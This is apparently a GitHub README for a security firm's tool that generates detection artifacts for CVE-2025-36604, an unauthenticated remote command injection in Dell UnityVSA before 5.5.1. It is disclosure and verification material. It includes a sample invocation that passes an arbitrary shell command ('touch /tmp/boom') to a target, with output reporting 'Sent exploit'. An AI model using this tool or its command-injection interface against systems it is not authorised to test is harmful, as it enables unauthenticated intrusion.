watchtowrlabs/watchTowr-vs-Dell-UnityVSA-PreAuth-CVE-2025-36604
GitHub: watchtowrlabs/watchTowr-vs-Dell-UnityVSA-PreAuth-CVE-2025-36604
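Detection artifact generator for CVE-2025-36604, the pre-authentication remote command injection vulnerability in Dell UnityVSA, supporting vulnerability verification and security testing.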
# watchTowr-vs-Dell-UnityVSA-CVE-2025-36604
Dell UnityVSA CVE-2025-36604 Detection Artifact Generator
https://github.com/user-attachments/assets/28488a97-7845-4b78-9fe7-64b9172ab023
For technical details, see our [blog post](https://labs.watchtowr.com/)
# Detection in Action
```
python watchTowr-vs-Dell-UnityVSA-PreAuth-CVE-2025-36604.py --target https://192.168.5.45/ --command "touch /tmp/boom"
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchTowr-vs-Dell-UnityVSA-CVE-2025-36604.py
(*) Dell UnityVSA Unauthenticated Remote Command Injection Detection Artifact Generator
- Sina Kheirkhah (@SinSinology) of watchTowr (@watchTowrcyber)
CVEs: [CVE-2025-36604]
[+] Sent exploit to https://192.168.5.45
```
# Description
This script is used to detect whether Dell UnityVSA is affected by the CVE-2025-36604 vulnerability.
# Affected Versions
Versions prior to 5.5.1 are affected by this issue.
For more information, see the [Dell UnityVSA security update advisory](https://www.dell.com/support/kbdoc/en-uk/000350756/dsa-2025-281-security-update-for-dell-unity-dell-unityvsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities)
# Follow [watchTowr](https://watchTowr.com) Labs
Follow the [watchTowr](https://watchTowr.com) Labs team for the latest security research
- https://labs.watchtowr.com/
- https://x.com/watchtowrcyber